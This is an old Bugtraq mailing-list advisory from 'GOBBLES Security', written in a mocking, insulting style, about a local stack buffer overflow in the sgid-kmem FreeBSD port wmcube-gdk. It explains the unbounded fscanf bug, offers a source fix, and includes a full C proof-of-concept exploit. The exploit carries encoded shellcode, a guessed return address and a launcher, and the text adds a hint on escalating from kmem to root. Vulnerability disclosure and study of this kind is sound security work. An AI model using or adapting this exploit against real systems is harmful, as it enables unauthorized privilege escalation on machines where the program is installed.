New Advisory + Exploit
Date: Mon, 17 Dec 2001 23:13:39 GMT
From: bugtraq <bugtraq@bugtraq.org>
To: bugtraq@securityfocus.com, vuln-watch@vulnwatch.org
Subject: New Advisory + Exploit
Hello everyone.
GOBBLES Labs proudly presents yet another advisory + exploit. Today's
product is wmcube-gdk, which is installed sgid(kmem) by FreeBSD's Ports
collection. After successful exploitation of the bug, gaining root
privileges is trivial. See attached advisory for details.
GOBBLES Labs
http://www.bugtraq.org
[Attachment: GOBBLES-13.txt]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++
ALERT! ALERT! FREEBSD LOCAL ROOT VULNERABILITY! ALERT! ALERT!
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#include "/var/spool/uucppublic/.gbbls/note.h"
"Love doesn't make the world go 'round,
love is what makes the ride worthwhile."
Alicia is in love!!! ---^
GOBBLES and he group do proudly present advisory on local root hole in a
program from the FreeBSD Ports collection. The overflow is in the program
itself so it is also there on the Linux, but the privilege gain depends on
the binary being installed sgid(kmem) like the FreeBSD port does, and that
is where GOBBLES did find hole when doing comprehensive ports audit.
GOBBLES didn't see any real need to waste time on crappy program exploits
for other operating systems and suspect this one is enough to teach
programmer timecop lesson in manners and one in humility.
PRODUCT
*******
Program:
-r-xr-sr-x 1 root kmem 20376 Dec 17 11:28 /usr/X11R6/bin/wmcube-gdk
FreeBSD port:
/usr/ports/sysutils/wmcube-gdk
Author WWW:
http://www.ne.jp/asahi/linux/timecop/
BACKGROUND
**********
GOBBLES crack he knuckles as he prepare to exercise copy/paste talent then
does submit the following to eyes of eager readers:
WMCube / GDK
This is modified and optimized version of wmCube 0.98, originally
available at this website.
Changes include much faster redraws, significantly lower CPU usage, ability
to specify color for both flat-shaded and wireframe objects, and transparent
CPU load / zoom buttons. Sorry, the "roll-in" sequence of original wmCube
has been removed. But with all these cool new features it's unlikely you
are going to miss it too long :) wmCube author is too busy to look over
my changes, so I am making them available here, with his approval :)
Note, Makefiles for systems other than Linux will need to be modified to
use gdk libraries. Check out README.GDK inside the tarball for some hints
where to start. If you make changes for your system, please send me
updated Makefile. Thank you.
PROBLEM
*******
GOBBLES notice user can specify object description file which overflow
small buffer which then transform wmcube-gdk into swiss army knife with
gid(kmem) privs. For all critics who say, "this not root if it only
gid(kmem)!" GOBBLES say, "Go back to security-basic mailing list to learn
trick for quickly becoming uid(root) on the FreeBSD and other OS when you
have gid(kmem). GOBBLES think that all people who quick to criticize
GOBBLES when all he really doing is saying things in tricky way to invite
criticism from ignorant so that GOBBLES can mock them are just complete
idiots who spend way too much time trying to get three years of "security
experience" so they can go take 250 question CISSP test and then let the
world know on mailing lists that they have elite whitehat pussy ethical
hacker with no skill certification (which is what CISSP stand
for). Anyhow, you idiots know who you are, and beware that any mockery of
GOBBLES by inexperienced and unskilled critics who brag certifications
will not be accepted, dummies. Hehehe GOBBLES got off on a little dark
tangent from he speech and will now get back to original subject, which is
local root exploit in wmcube-gdk.
Funny thing that GOBBLES did notice is that wmcube program that wmcube-gdk
is based off is not vulnerable to this bug (but is to others, go do
sourcecode audit before GOBBLES make monkey out of you!), so the fault is
entirely belonging to programmer timecop... encourage him to stop writing
code with silly beginner style mistakes. Stupid mistakes made by stupid
beginner programmer.
VENDOR NOTIFICATION STATUS
**************************
GOBBLES first do privmsg timecop: identify tricks on efnet with long
string to see who make right rules for Ettercap exploit (snort.org
official ones worthless, but idiot criticize us!) hehe then GOBBLES did
proceed to try and discuss issue with programmer timecop but did not get
any response from selfrighteous bastard so oh well GOBBLES not really
caring to help anymore. Important for software programmers to all be
active subscribers and contributors to securityfocus.com mailing lists so
they can find out about earthshattering bugs that indirectly affect their
code and then can go audit and fix new bugs, understand what GOBBLES wants
you developers all to do?
TECHNICAL DETAILS
*****************
Here problem GOBBLES did spot in wmcube.c, in the function loadobj().
int loadobj(char *filename)
{
    FILE *fp;
    char tmp[64] = { "" };      /* 64-byte stack buffer for each token */
    int i = 0, counter = 1;
    ...
again:
    ...
    fscanf(fp, "%s", tmp);      /* no field width: a token of 64+ bytes runs off the end of tmp */
    ...
    goto again;
}
As you can see, programmer pick to choose 64 byte small buffer, which is
OK by itself, but the problem is the fscanf(fp, "%s", tmp); trick used
multiple times in code he make of loadobj(). "%s" with no field width read
until next whitespace no matter how long the token is, so token of 64 or
more characters write past end of tmp over whatever sits above it on the
stack, saved return address included. Bad decision by newbie programmer who
do not understand that penetrator can specify own object description file
with -o argument, put one long token in it, and overflow the 64 byte buffer
inside sgid(kmem) process! Good thing GOBBLES catch all bugs in software,
hehe!
WORKAROUND
**********
[0x01]
Shutdown your computer until an official fix is available..
..OR..
[0x02]
Replace fscanf(fp, "%s", tmp); in loadobj(), wmcube.c with
fscanf(fp, "%63s", tmp); (the field width leaves one byte for the NUL), or
with fgets(tmp, 64, fp); if you also fix up the parser around it, because
fgets read whole lines and not whitespace-separated tokens like "%s" does.
Either way, check that the token really ended (next character is whitespace
or EOF) and reject the file if not, otherwise the tail of a truncated token
just gets parsed as the next token.
Then uninstall bad wmcube-gdk, recompile and do a new install!
DEMONSTRATION
*************
GOBBLES do some more copy/paste acrobatics to show better idea of how this
vulnerability exists and stuff.
<snip>
===> Registering installation for wmcube-gdk-0.98p1
===> SECURITY NOTE:
This port has installed the following binaries which execute with
increased privileges.
667014 40 -r-xr-sr-x 1 root kmem 20376 Dec 17 09:43 /usr/X11R6/bin/wmcube-gdk
If there are vulnerabilities in these programs there may be a security
risk to the system. FreeBSD makes no guarantee about the security of
ports included in the Ports Collection. Please type 'make deinstall'
to deinstall the port if this is a concern.
For more information, and contact details about the security
status of this software, see the following webpage:
http://www.ne.jp/asahi/linux/timecop/
</snip>
GOBBLES@freegobbles:~$ ./GOBBLESwmc # GOBBLES whitehat PoC exploit
GOBBLES!
uid=1001(GOBBLES) gid=1001(GOBBLES) groups=1001(GOBBLES), 2(kmem)
GOBBLES@freegobbles:~$
As you can see, GOBBLES had Andrew write pussy whitehat style PoC exploit
to keep penetrators from using it maliciously (GOBBLES certain this futile
effort to keep weapons out of penetrator hands though, since someone will
undoubtedly "fix" exploit then republish it showing how smart they are for
being able to "fix" simple things, idiots not understanding the reason for
distributing in PoC format).
CONCLUSION
**********
Since there is security vulnerability in sgid kmem program GOBBLES decide
to deinstall package so no evil penetrators may sneak into GOBBLES private
kernel memory$!@#%.
root@freegobbles:/usr/ports/sysutils/wmcube-gdk# make deinstall
===> Deinstalling for wmcube-gdk-0.98p1
root@freegobbles:/usr/ports/sysutils/wmcube-gdk#
Now, GOBBLES feels much safer, hehehe.
So, what GOBBLES learn this time?
Fancy program might not be secure! Similar to philosophy of writing
exploits in penetrator program Ettercap, but slightly different since
wmcube-gdk just fancy program, and not evil penetrator program, hehe.
POC EXPLOIT
***********
This hole give root indirectly after getting gid(kmem). GOBBLES suggest
trying strings in memory to find master.password then using Mickey Mouse
Hacking Squadron UnicOS exploits to gain root on Cray's to do password
cracking to get root, then do su root - trick to get root on
machine. From GOBBLES extensive research into subject matter of root
password he find that most FreeBSD root password are "love", but that is
not GOBBLES root password so do not even try, hehe!
This time GOBBLES choose to not include shellcode that execve() /bin/bash
so FreeBSD admin can feel safe until author patches he program!
/*
 * (c) Andrew / GOBBLES Security
 *
 * PoC exploit for wmcube-gdk (FreeBSD/i386)
 *
 * Usage: /path/to/GOBBLES-wmcube-gdk-exploit [offset]
 *
 * Writes an object file whose first WMCUBE_COORDINATES token is far longer
 * than loadobj()'s tmp[64], then runs wmcube-gdk -o on it. The token carries
 * a return address and shellcode; the shellcode only prints "GOBBLES!" and
 * exits, it does not spawn a shell.
 */
#include <sys/types.h>   /* u_long */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

/*
 * FreeBSD/i386: build "GOBBLES!\n\n" on the stack, write(2) it to fd 0,
 * then exit(2). Immediates are stored inverted and fixed up with NOT so the
 * code has no NUL or whitespace bytes, either of which would end the
 * fscanf("%s") token that delivers it.
 */
unsigned char GOBBLES_shellcode[] =
    "\xb8\xf5\xf5\xff\xff\xf7\xd0\x50\xb8\xb3\xba\xac\xde\xf7\xd0\x50"
    "\xb8\xb8\xb0\xbd\xbd\xf7\xd0\x50\x89\xe6\x31\xc0\x31\xdb\xb0\xf5"
    "\xf6\xd0\x50\x56\x53\xb0\x04\x50\xcd\x80\xb0\x01\x50\xcd\x80";

int main(int argc, char **argv)
{
    FILE *fd;
    int i;
    u_long retaddy = 0xbfbff634;   /* guessed stack address of the shellcode */

    if (argc == 2)
        retaddy += atoi(argv[1]); /* nudge the guess without recompiling */

    fd = fopen(".gobbles", "w");
    if (fd == NULL) {
        perror("fopen .gobbles");
        return 1;
    }
    fprintf(fd, "WMCUBE_COORDINATES\n");
    fprintf(fd, "1aaa");           /* atoi() stops at 'a' and sees 1; no whitespace, so the token keeps going */
    for (i = 0; i < 64; i += 8)    /* filler up to the saved return address */
        fprintf(fd, "GOBBLES!");
    printf("GOBBLES: Using %lx as retaddy\n", retaddy);
    fflush(NULL);
    fwrite(&retaddy, 4, 1, fd);    /* little-endian 32-bit return address */
    fprintf(fd, "GOBBLES!");       /* padding between return address and shellcode */
    fprintf(fd, "GOBBLES!");
    fprintf(fd, "%s", GOBBLES_shellcode);
    fprintf(fd, " 0 -42 42\n");    /* the space finally terminates the long token */
    fprintf(fd, "WMCUBE_LINES\n");
    fprintf(fd, "1 1\n");
    fclose(fd);

    execl("/usr/X11R6/bin/wmcube-gdk", "wmcube-gdk", "-o", ".gobbles", (char *)NULL);

    /* Only reached if execl() failed; on success wmcube-gdk replaces this process. */
    unlink(".gobbles"); /* Mum always told me to cleanup when im done! */
    fprintf(stderr, "System immune against GOBBLES exploit! (%s)\n", strerror(errno));
    return 0;
}
GREETS
******
dianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble,
knightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org,
blackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet,
bugtraq (thanks aleph1 and david ahmad for devoting your time to a great
list), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin
bontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley,
manly p hall, franz bardon, dennis ritchie, nietzsche, w. richard stevens,
radiohead, george michael, larry wall, beethoven, francis bacon, bruce
willis, bruce schneier, alan turing, john von neumann, donald knuth, michael
abrash, robert sedgewick, richard simmons, government boy, ralph lauren,
kevin mitnick, david koresh, the violent femmes, legions of doom, quentin
tarantino, JUPES, security.nnov.ru, dugsong, wayne gretzky,
hhp-programming.net, so1o, the HaX0R bRoThErS, nasa.gov, alfred hitchcock,
ray bradbury, linux torvalds, alyssa milano, sarah michelle geller, jennifer
lopez, catherine zeta jones, robert de niro, plato, leonardo da vinci,
nostradamus, adam weishaupt, adema, kmfdm, eliphas levi, john dee, goo goo
dolls, savage garden, george bush, john howard, tony blair, ashida kim,
andrew tanenbaum, comp.lang.c, solar designer, patanjali, vayu siddhi,
deepak chopra, ajna chakra, fuzzy bunny, lockdown, bronc buster,
attrition.org, cliff stoll, bill gates, alan cox, george harrison,
berkeley.edu, microsoft.com, isox, american mcgee, princess toadstool, ru
paul, sharon stone, taeho oh, napster, nocarrier, steve wozniak, captain
crunch, tony the tiger, juliette lewis, oliver twist, yakko, wakko (but
no dot), santa claus, the easter bunny, the christmas tree, hacktech.org,
mixter and the rest of #darknet/2xs, the planet Pluto, pluto the dog (from
walt disney), walt disney, the smurfs, packetstormsecurity.org, chocolate,
caramel, marshmallows, rice crispies, rice crispie treats, cousin WOBBLES,
rfp, Alan@packetstorm, george bush senior, george w. bush, his drunken
daughters, gary coleman, fat albert, rhino9, eEye.com (hehe good work on
application firewall thing or whatever), the djali zwan, digital unix,
o'reilly & associates (smart folk selling sketches on cover of book filled
with printed manpages with little bit of funny jokes, hehe they rich now),
hwa-security.net, #malvu/efnet, donkey kong, diddy kong, p diddy (GOBBLES
not understand the english in this name? but he good artist anyway), mr.
peanut, all girls who pose naked on webcam for GOBBLES, mr goldilocks (you
memory live on forever, old chum), checkpoint.com (thank you for free stuff
like nice new shirt and pen and golf tees that all say Checkpoint, hehe),
whoever invented deodorant, monkey.org, and all our friends and family.
GOBBLES SECURITY
http://www.bugtraq.org/